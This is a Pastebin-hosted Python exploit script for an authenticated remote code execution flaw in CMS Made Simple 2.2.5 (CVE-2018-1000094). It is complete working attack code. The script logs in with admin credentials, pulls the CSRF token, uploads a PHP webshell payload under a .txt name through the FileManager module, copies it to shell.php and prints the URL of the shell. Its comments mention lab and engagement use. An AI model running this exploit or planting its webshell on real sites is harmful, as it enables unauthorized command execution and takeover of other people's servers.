exploit_rce_cms_made_simplev2-2-5.py

Dec 25th, 2020
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.66 KB | None | 0 0
  1. # Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
  2. # Date: 3rd of July, 2018
  3. # Exploit Author: Mustafa Hasan (@strukt93)
  4. # Vendor Homepage: http://www.cmsmadesimple.org/
  5. # Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
  6. # Version: 2.2.5
  7. # CVE: CVE-2018-1000094
  8.  
  9. import requests
  10. import base64
  11.  
# --- Target and credentials ---------------------------------------------------
# URL of the CMSMS admin directory on the target (no trailing slash).
base_url = "http://192.168.1.3/cmssm/admin"
# Site-root-relative directory the payload is uploaded to and copied within.
upload_dir = "/uploads"
# Everything before "/admin" is taken as the site root; the shell is expected
# to be reachable under <site root>/uploads afterwards.
upload_url = base_url.partition('/admin')[0] + upload_dir
# The exploit is authenticated: these must be valid admin credentials.
username = "root"
password = "20002000"

# Name of the query parameter carrying the anti-CSRF token in the post-login
# redirect; parse_csrf_token() reads the token from the Location header.
csrf_param = "_sk_"
# The payload is uploaded under a .txt name first and then copied to a .php
# name through the FileManager module (see upload_txt / copy_to_php).
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
# Unauthenticated webshell: anyone who finds the URL can run OS commands via
# ?cmd=... Remove it from the target as soon as the engagement allows.
payload = "<?php system($_GET['cmd']);?>"
  22.  
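def parse_csrf_token(location, param=None):
    """Extract the anti-CSRF token from the post-login redirect URL.

    ``location`` is the ``Location`` header value returned by ``login.php``.
    The token is taken as the value of the ``param`` query parameter
    (defaults to the module-level ``csrf_param``, i.e. ``_sk_``). Only the
    parameter's own value is returned: the string is cut at the first ``&``
    or ``#`` so that further query parameters or a fragment are not sent to
    the server as part of the token.

    Raises:
        ValueError: the parameter is missing or empty. This replaces the bare
            ``IndexError`` the old ``split()[1]`` produced, which gave no hint
            that the redirect simply did not carry the token (wrong CSRF
            parameter name, or a redirect to somewhere other than the console).
    """
    if param is None:
        param = csrf_param
    # Echo the raw header so a different parameter name is easy to spot.
    print("[+] String that is being split: " + location)
    _, found, rest = location.partition(param + "=")
    if not found:
        raise ValueError("CSRF parameter {!r} not found in redirect: {!r}".format(param, location))
    # Stop at the next parameter or fragment; the token is the bare value.
    token = rest.split("&", 1)[0].split("#", 1)[0]
    if not token:
        raise ValueError("CSRF parameter {!r} is empty in redirect: {!r}".format(param, location))
    return token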
  26.  
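def authenticate():
    """Log in to the CMSMS admin console with the configured credentials.

    POSTs ``username``/``password`` to ``<base_url>/login.php`` without
    following redirects: a 302 is treated as a successful login and the
    anti-CSRF token is read from that response's ``Location`` header via
    ``parse_csrf_token``. Any other status code is treated as a failed login
    (presumably the form being re-rendered with a 200).

    Returns:
        ``(cookies, csrf_token)`` on success -- ``cookies`` is the requests
        cookie jar holding the admin session -- or ``(None, None)`` on failure.
        A 302 that carries no ``Location`` header is reported as a failure
        instead of dying with a ``KeyError``.
    """
    url = base_url + "/login.php"
    data = {
        "username": username,
        "password": password,
        "loginsubmit": "Submit",
    }
    # If the target is HTTPS with an untrusted (self-signed) certificate, add
    # verify=False here. That disables certificate validation entirely, so
    # only do it against a lab/engagement host you control.
    response = requests.post(url, data=data, allow_redirects=False)
    if response.status_code != 302:
        print("[-] Authentication failed")
        return None, None
    location = response.headers.get('Location')
    if not location:
        print("[-] Authentication redirected but no Location header was returned")
        return None, None
    print("[+] Authenticated successfully with the supplied credentials")
    return response.cookies, parse_csrf_token(location)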
  42.  
def upload_txt(cookies, csrf_token):
    """Upload the PHP payload to the FileManager module under a .txt name.

    Sends ``payload`` as ``txt_filename`` through the module's ``upload``
    action (``mact=FileManager,m1_,upload,0``) using the admin session
    cookies and the CSRF token obtained at login. ``copy_to_php`` later
    copies this file to its .php name.

    Returns:
        ``True`` when the server answered 200, ``None`` otherwise. Note that a
        200 is only a weak success signal -- the module may well answer an
        upload it rejected with a 200 as well -- so a failure in the copy
        step afterwards is the more reliable indication that this step did
        not actually work.
    """
    url = base_url + "/moduleinterface.php"
    form = {
        "mact": "FileManager,m1_,upload,0",
        csrf_param: csrf_token,
        "disable_buffer": 1,
    }
    files = {'m1_files[]': (txt_filename, payload)}
    print("[*] Attempting to upload {}...".format(txt_filename))
    # HTTPS target with an untrusted certificate: add verify=False here. That
    # disables certificate validation, so only do it against a lab/engagement
    # host you control.
    reply = requests.post(url, data=form, files=files, cookies=cookies)
    if reply.status_code != 200:
        print("[-] An error occurred while uploading {}".format(txt_filename))
        return None
    print("[+] Successfully uploaded {}".format(txt_filename))
    return True
  63.  
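def _php_serialized_selection(filename):
    """Build the ``m1_selall`` value FileManager expects for one selected file.

    The module takes a PHP-serialized array of base64-encoded file names:
    ``a:1:{i:0;s:<len>:"<base64>";}``. Encoding is done explicitly so the
    same code runs on Python 2 and 3 -- on Python 3 ``base64.b64encode``
    requires bytes and returns bytes, and the previous ``b64encode(str)``
    raised ``TypeError`` there.
    """
    b64 = base64.b64encode(filename.encode('utf-8')).decode('ascii')
    # s:<n> is a byte length; base64 output is pure ASCII, so len() matches.
    return 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)


def copy_to_php(cookies, csrf_token):
    """Copy the uploaded .txt payload to ``php_filename`` via FileManager.

    Uses the module's ``fileaction`` copy (``mact=FileManager,m1_,fileaction,0``)
    with ``m1_path=upload_dir`` as the source directory and ``m1_destname``
    set to the .php name. This is the step that produces an executable file
    from the text upload; the destination directory ``/`` is presumably
    relative to the upload root, since ``run`` expects the shell under
    ``upload_url``.

    Returns:
        ``True`` when the server replied 302 with a ``Location`` ending in
        ``copysuccess``, ``None`` otherwise. A 302 without a ``Location``
        header counts as failure instead of raising ``KeyError``.
    """
    url = base_url + "/moduleinterface.php"
    data = {
        "mact": "FileManager,m1_,fileaction,0",
        csrf_param: csrf_token,
        "m1_fileactioncopy": "",
        "m1_path": upload_dir,
        "m1_selall": _php_serialized_selection(txt_filename),
        "m1_destdir": "/",
        "m1_destname": php_filename,
        "m1_submit": "Copy",
    }
    print("[*] Attempting to copy {} to {}...".format(txt_filename, php_filename))
    # The outcome is signalled in the redirect target, so do not follow it.
    # HTTPS target with an untrusted certificate: add verify=False here (this
    # disables certificate validation -- lab/engagement hosts only).
    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
    location = response.headers.get('Location', '')
    if response.status_code == 302 and location.endswith('copysuccess'):
        print("[+] File copied successfully")
        return True
    print("[-] An error occurred while copying, maybe {} already exists".format(php_filename))
    return None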
  89.  
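def quit():
    """Report failure and terminate the script with a non-zero exit status.

    Note: this shadows the ``quit`` builtin; the name is kept because ``run``
    calls it. ``SystemExit(1)`` replaces the bare ``exit()``, which exited
    with status 0 and so made a failed run indistinguishable from a
    successful one to shells and wrapper scripts.
    """
    print("[-] Exploit failed")
    raise SystemExit(1)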
  93.  
def run():
    """Run the three exploit steps: log in, upload the .txt, copy it to .php.

    Calls ``quit`` (which terminates the script) at the first step that
    fails. On success prints the URL of the resulting webshell, which takes
    OS commands in its ``cmd`` query parameter (see ``payload``). Delete the
    shell from the target when the engagement is over.
    """
    cookies, csrf_token = authenticate()
    if not cookies:
        quit()
    for step in (upload_txt, copy_to_php):
        if not step(cookies, csrf_token):
            quit()
    shell_url = upload_url + '/' + php_filename
    print("[+] Exploit succeeded, shell can be found at: {}".format(shell_url))
  103.  
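if __name__ == "__main__":
    # Guarded so that importing this module (e.g. to reuse authenticate())
    # does not fire the exploit at the configured target.
    run()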